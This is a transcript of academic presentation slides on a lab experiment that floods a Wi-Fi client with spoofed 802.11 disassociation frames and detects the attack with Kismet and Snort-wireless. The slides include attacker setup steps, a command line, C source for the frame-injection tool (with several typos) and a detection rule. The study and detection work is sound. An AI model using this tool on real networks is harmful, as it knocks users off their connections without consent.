Presentation
Download
Report
Transcript Presentation
Attacking and Detection:
Deny of Service in Wireless Network
by Injecting Disassociation Frames
through Data Link Layer
Yufei Xu, Xin Wu, Da Teng
Outline
Introduction
Background
Simulation Design
Setting Up Environment
Experimental Results & Analysis
Conclusion
Introduction
802.11:
a set of standards for wireless local area
network (WLAN) computer communication.
concern the lowest two layers in OSI model:
Data Link Layer and Physical Layer
many attacks: Man-in-The-Middle, DoS,
WEP
Disassociation attack: one of DoS attack
Background
Architecture of wireless network
Stations: all components that can connect
into a wireless medium in a network. All
stations are equipped with wireless network
interface cards.
Access points(APs): base stations for the
wireless network; transmit and receive radio
frequencies for wireless enabled devices to
communicate with.
Background (cont)
Architecture of wireless network
Basic service set (BBS): a set of all
stations that can communicate with each
other.
Extended service set (ESS): a set of
connected BSSes.
Distribution system: connects APs in an
extended service setup.
ad-hoc network: contains no access
points
Background (cont)
Distribution System (DS)
AP
Station
STA
BSS
BSS
Extended Service Set (ESS)
Figure 1. Infrastructure Network
Laptop
PC
Figure 2. ad-hoc Network
Background (cont)
802.11 in OSI Model
Application layer
OSI Model:
defines a
framework for
implementation
of networking
protocols in 7
layers.
Presentation layer
Session layer
Transport layer
Network layer
Data link layer
Physical layer
Physical link
Background (cont)
802.11 in OSI Model
802.11 standards only concern the data
link layer and physical layer.
Data link layer in 802.11 is subdivided in
to two sublayers:
Medium Access Control (MAC): a set of
rules which defines how to send data and
access the wireless medium
Logical Link Control (LLC): deals with the
error control, framing, and MAC
addressing.
Background (cont)
Wireless Frame: 3 kinds of frames
data frame
management frame
control frame
Frame
control
Duration
/ID
Addr
1
Addr
2
Addr
Seq.
Addr
3
control
4
Frame
body
FCS
Background (cont)
Denial of Service(DoS): an action or series
of actions that prevents any part of a
system from working in conformity to its
intention.
DoS attack: makes a computer resource
unavailable to its intended users.
resource allocation attacks
resource destruction attacks
Background (cont)
Disassociation attack
How does a station connects to a network?
The APs have the responsibilities to mediate all wireless
traffic in the network.
A station must associate with an AP to join the network.
Then it can send data to and get data from the network.
Detailed steps:
The AP broadcasts its SSID to the air.
A station can become aware of the wireless network by
receiving wireless frames containing such information.
Once it gets the SSID from an AP, it must conduct the
authentication process with that AP prior to any upper layer
authentication such as 802.1x.
Background (cont.)
A station provides its identity to AP.
AP may grant a station or deny it according to the network
configuration, for example, whether the station is in AP’s
black list.
802.11 standards define 2 link-level types of authentication:
open system, and shared key.
They are not mutual since only AP authenticates stations, but
not vice versa.
Data in this process is not encrypted.
The station associates (register) with the AP to get full
access to the network.
It sends an Association Request to AP.
Background (cont.)
AP grants association and responds with a status code
standing for success and the Association ID. Otherwise a
response for failure will be sent and the procedure ends.
AP forwards frames to and from the station: the station
can communicates with other devices from now on.
Association is logically similar to connecting to a wired
network.
A station can only associate with 1 AP at a time,
but it may re-associate with another one when
connection problems occurs, or when it roams in
the whole wireless network.
Background (cont.)
The state diagram of
authentication and association.
What’s disassociation attack?
A fake disassociation frame is
generated by attacker, sent to
victim.
AP’s MAC as the source, and
victim’s MAC as the destination.
Keep sending, so victim is
unavailable to other devices.
It’s a kind of DoS attack.
State 1
Unauthenticated,
Unassociated
authentication
Ok
deauthentication
State 2
Authenticated,
Unassociated
association or
reassociation
Ok
deauthentication
disassociation
State 3
Authenticated,
Associated
Simulation design
To demonstrate the affect of
disassociation attack, we design our
simulations as the following.
L4(ATTACKER)
Architecture
L2: plays a role as victim which
receives disassociation frames from the
attacker.
L1: serves as a normal machine which
sends ping messages in order to get
ICMP echo service from the victim L2.
L3: works as an IDS which monitors all
traffics over the entire network.
L4: will sit outside of the network and
periodically sends disassociation
messages to the intended victim L2.
L2(VICTIM)
L3(DECTCTOR)
L1(TESTER)
Simulation design (cont.)
Designed working flow
Let attacker (L4) keeps sending fake disassociation frames to victim
(L2).
Evaluate victim’s availability by tester (L1) which is accessing
victim’s echo service. Actually, this is done by sending ICMP
packages and receiving echo responses.
Meanwhile, the IDS (L3) should detect such an attack, alarming
and logging physical frames that it gets to dump files.
Change the rate at which the attacker sends disassociation frames
to observe how severely the victim is affected.
Analyze dump files to evaluate how efficiently the IDS detects
attacks at different attack frequencies.
Setting up environment
Hardware and software configuration
Host
OS
Wireless NIC
Driver
Application
AP
D-link DI524
802.11g Router
Tester (L1)
IBM Thinkpad T61
Windows Vista Home
Intel Wireless WiFi Link
4965 AGN (802.11a/g/n)
Supported by
Vista
Victim (L2)
Asus M3NP Laptop
Windows Server 2003
Standard
Netgear WG511 802.11b
(Based on Prism 54 chipset)
Netgear WG511
Wireless
Assistant
IDS (L3)
IBM Thinkpad R50
Red Hat 9 (kernel
2.4.20-8)
SMC 2532W-B 802.11b
(Based on Prism 2.5 chipset)
HostAP 0.0.4
1) Kesmet 2006.04.R1
2) Snort-Wireless 2.4.3alpha04
Attacker
(L4)
Toshiba Satellite M30
Laptop
Red Hat 9 (kernel
2.4.20-8)
SMC 2532W-B 802.11b
(Based on Prism 2.5 chipset)
HostAP 0.0.4
1) Libwlan (API)
2) A program based on it.
Why choose Prism-based wireless network card?
It is based on Intersil Prism 2.5 chipset and allows data injection
through data link layer if driven by HostAP driver.
It can also be configured to operate at promiscuous mode to monitor
the traffics over the entire network.
Setting up environment (cont.)
Software installations
Constructing attacker
Install Red Hat 9 with kernel 2.4.20-8 through installation CD.
Copy a configuration file /usr/src/linux-2.4.20-8/configs/kernel-2.4.20-i386.config
to /usr/src/linux-2.4.20-8/.config.
Download hostap-0.0.4.tar.gz and uncompress it.
Edit its Makefile and hostap_cs.c, change some value to matching this
computer.
Install hostap by execute make pccard & make install_pccard.
Download libwlan-0.1.tar.gz and install it.
Code a program based on libwlan, and compile it. This program works
as the attack tool.
Constructing detector
Install OS and drivers similar to attacker (L4).
Install kismet 2006 as the IDS, and configure it.
(Please refer to report for installation details)
Experimental Results And Analysis
Procedures for conducting experiments:
Start Kismet first at the detector (L3) side by typing the
following commands:
cd /root
ifconfig wlan0 promisc
kismet
The tester (L1) starts testing by ping the victim (L2) and
another machine by typing:
ping 192.168.1. 103 –t
ping 192.168.1.1 –t
----victim’s IP
----third party’s IP
Attacker (L4) starts attacking by running our program (for
details, please refer to the appendix of source code) by
following command:
./deassoci wlan0ap 00:11:95:75:23:9a 00:09:5b:83:f8:9c 00:11:95:75:23:9a
Where: the first mac is bssid of the nework.
The second mac is the victim’s mac.
The third mac is the spoofed mac used by the attacker (hacker
pretends real AP to send disassociation frames to victim) .
Experimental Results And Analysis (Cont.)
Procedures for conducting experiments (Cont.):
Check what happens on the tester (L1) side.
When the attacking program finishes execution, we stop Kismet.
Use snort-wireless to interpret the dumped file created by Kismet:
snort –X –w –c disassociation.rule –r Kismet-01-nov-2007-1.dump
snort –X –w –r /var/log/snort/snort-99833875.dump>/root/dissassoc_rate_02.log
Repeat the above process at different rate of sending the
disassociation frames.
Experimental Results And Analysis (Cont.)
Before attacking, we, on tester’s side, observe:
Tester, at IP: 192.168.1.101, can successfully ping both third party (above) and the
victim (below).
Experimental Results And Analysis (Cont.)
When we send the disassociation frames at rate 5
frames/second, we, on tester’s side observe:
Tester, at IP: 192.168.1.101, is still able to ping the third party (above). However,
it can’t ping the victim at 192.168.1.103 (indicated as the following):
Experimental Results And Analysis (Cont.)
Furthermore, when we send the disassociation frames at
1frame/second and 1frame/10seconds respectively, they have
no affect on tester pinging third party, but do affect pinging
victim.
The former one refers to rate of 1frame/second while the later regards to the of
1frame/10seconds.
Experimental Results And Analysis (Cont.)
On the other hand, Kismet, as an IDS, has the following
display at rate of 5fames/second.
It explicitly alarms that there is a “de-authentication/disassociation”
flood on 00:00:00:00:00:00.
MAC 00:00:00:00:00:00 here means a network BSSID.
Experimental Results And Analysis (Cont.)
Regarding to sending disassociation frames at rate
1frame/second, Kismet displays:
In this situation, Kismet reports a suspicious disassociation frame from
MAC: 00:11:95:75:23:9A
MAC 00:11:95:75:23:9A here refers to source of disassociation frames.
Experimental Results And Analysis (Cont.)
Why Kismet generates different reports regarding to
these two different situation ?
The reason is still due to the rate at which disassociation frames
are sent.
At a high rate, say 5frames/second, Kismet is able to recognize
such an absolutely abnormal situation and report disassociation
flood happened on network 00:00:00:00:00:00.
When a relatively lower rate, for instance 1frame/second in our
case (but still high compared with the normal situation), Kismet
generate an alarm questioning disassociation frames from a
particular source (MAC 00:11:95:75:23:9A).
Experimental Results And Analysis (Cont.)
Why Kismet reports a disassociation flood on network
with BSSID: 00:00:00:00:00:00 when we send disassociation frames at rate 5frames/second ?
This can be answered from the actual disassociation frames we
sent over the network:
0x0000: A0 08 02 01 00 09 5B 83 F8 9C 00 11 95 75 23 9A
0x0010: 00 00 00 00 00 00 F0 6B 05 00
The first byte “A008” means this is disassociation frame.
The second byte “0201” is duration ID used to calculate the
value of NAV.
The following six bytes “00095B83F89C” represents the destination’s MAC which is the victim’s MAC.
The subsequent six bytes “00119575239A” stands for the
source’s MAC from which this frame is sent.
Experimental Results And Analysis (Cont.)
The following six bytes combination “000000000000” refers to the
network’s BSSID.
The next two bytes “F06B” are used for sequence control.
The last two bytes “0500” are used to represent the reason why this
disassociation frame is sent.
From the above illustration of the frame’s format, it is rational
that when Kismet reports a disassociation flood suffered by a
network, the BSSID (00:00:00:00:00:00) will be referred.
Experimental Results And Analysis (Cont.)
Finally, when we use “snort-wireless” to interpret the
dump files created by Kismet for rate 1frame/second
and 5frames/second respectively, we observe:
For rate 1frame/second, snort-wireless reports 801 such
disassociation frames were captured by Kismet.
Regarding to rate 5frames/second, snort-wireless reports 720
such frames were logged by Kismet.
Consequently, from the above observation we can infer
that Kismet’s logging capability is also related to rate
at which disassociation frames are sent.
Conclusions
Experimental results indicate the following conclusions:
The severity that a victim suffers from the attack is proportional
to the rate at which the disassociation frames are sent. As the
rate of disassociation frames increase, the victim will be more
severely affected.
Kismet has the ability to report the severity of the attack based
on detecting the rate at which the disassociation frames are sent.
The capturing ability of Kismet, as an IDS, is also related to rate
at which the disassociation frames are sent. At a relatively high
rate, Kismet can’t capture all the disassociation frames.
Appendix 1 – source code
#include <libwlan.h>
int main(int argc, char *argv[]) {
int s, *len, i, j;
const char *iface = NULL; //interface referred by the established socket
struct ieee80211_mgmt mgmt; //structure for management frame defined in Libwlan
char *bssid_addr. *dst_addr, *src_addr; //refer to bssid, destination mac, source mac supplied by command line
u_char *bssid, *dst_mac, *src_mac; //store converted bssid, destination mac, sourc mac in hexadecimal
if(argc != 5) //improper input supplied by user
{
pirntf(“Usage: %s <wlan#ap> <bssid_address> <dst_address> <src_address>\n”, argv[0]);
pirntf(“Example: %s wlan0ap 00:01:23:45:0A 00:01:23:45:0A 00:02:4C:00:00\n”, argv[0]);
exit(-1); }
else{
iface = argv[1];
//store the interface
bssid_addr = argv[2]; //store the bssid
dst_addr = argv[3]; //store the destination mac
src_addr = argv[4]; } //store the source mac
s = socket_init(iface); //construct the socket for send frames
len = malloc(1);
bssid = lib_hex_aton(bssid_addr, len); //convert the bssid into hexadecimal
dst_mac = lib_hex_aton(dst_addr, len); //convert the destination mac into hexadecimal
src_mac = lib_hex_aton(src_addr, len); //convert the source mac into hexadecimal
for( j=1 ; j<= 100; j++){
for(i=1; i<=10; i++){ mgmt = build_disassoc(dst_mac, src_mac, bssid, WLAN_REASON_DISASSOC_AP_BUSY); //construct the disassociation frame
if( send (s, &mgmt, IEEE80211_HDRLEN + sizeof (mgmt.u.disassoc), 0) < 0) {
perror (“ send: ”);
sleep(1); }
//usleep (200000);
sleep (10); }
rintf(“Progression status: %.1f %%\n”, j/100.0 * 100); }
close (s);
return 0;
}
Appendix 2 – Rule for Snort-wireless
alert wifi 00:11:95:75:23:9A -> 00:09:5B:83:F8:9C (msg: “Disassociation
Attack”; type: TYPE_MANAGEMENT; stype: STYPE_DISASSOC;)
Appendix 3 – Disassociation Frames
11/01-22:55:23.268612 Dissassoc. 0:11:95:75:23:9A -> 0:9:5B:83:F8:9C
bssid: 0:0:0:0:0:0 Flags: Re
0x0000: A0 08 02 01 00 09 5B 83 F8 9C 00 11 95 75 23 9A ......[......u#.
0x0010: 00 00 00 00 00 00 F0 6B 05 00
.......k..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+==+
11/01-22:55:23.363666 Dissassoc. 0:11:95:75:23:9A -> 0:9:5B:83:F8:9C
bssid: 0:0:0:0:0:0 Flags: Re
0x0000: A0 08 02 01 00 09 5B 83 F8 9C 00 11 95 75 23 9A ......[......u#.
0x0010: 00 00 00 00 00 00 F0 6B 05 00
.......k..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
11/01-22:55:23.455478 Dissassoc. 0:11:95:75:23:9A -> 0:9:5B:83:F8:9C
bssid: 0:0:0:0:0:0 Flags:
0x0000: A0 00 02 01 00 09 5B 83 F8 9C 00 11 95 75 23 9A ......[......u#.
0x0010: 00 00 00 00 00 00 00 6C 05 00
.......l..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
Appendix 4 – Alerts by Snort-wireless
[**] [1:0:0] Disassociation
11/01-21:06:36.936921
[**] [1:0:0] Disassociation
11/01-21:06:38.812559
[**] [1:0:0] Disassociation
11/01-21:06:38.815930
[**] [1:0:0] Disassociation
11/01-21:06:38.880704
[**] [1:0:0] Disassociation
11/01-21:06:39.822643
[**] [1:0:0] Disassociation
11/01-21:06:39.921190
Attack [**]
Attack [**]
Attack [**]
Attack [**]
Attack [**]
Attack [**]
References
[1] S. Anderson, “A Linux Wireless Access Point HOWTO” chapter 4, v0.1, 2003,
June 6, [Online] Available: http://oob.freeshell.org/nzwireless/hostap.html
[2] Source Location for downloading hostap-0.0.4 driver: [Online] Available:
http://hostap.epitest.fi/releases/
[3] Source Location for downloading libwlan-0.1: [Online] Available:
http://wirelessexposed.blogspot.com/2007/03/hakcing-tools-at-your-disposal.html
[4] Source Location for downloading Kismet-2006-04-R1: [Online] Available:
http://www.kismetwireless.net/
[5] Source Location for downloading snort-wireless-2.4.3-alpha04: [Online]
Available: http://snort-wireless.org/
[6] Pablo Brenner “A Technical Tutorial on the IEEE 802.11 Protocol” 1996.
Breeze.com
[7] Allison H. Scogin “Disabling a Wireless Network via Denial of Service”
Technical Report MSU-070424
[8] http://www.intel.com/support/wireless/wlan/sb/CS-025325.htm
Question Period
Any Questions ?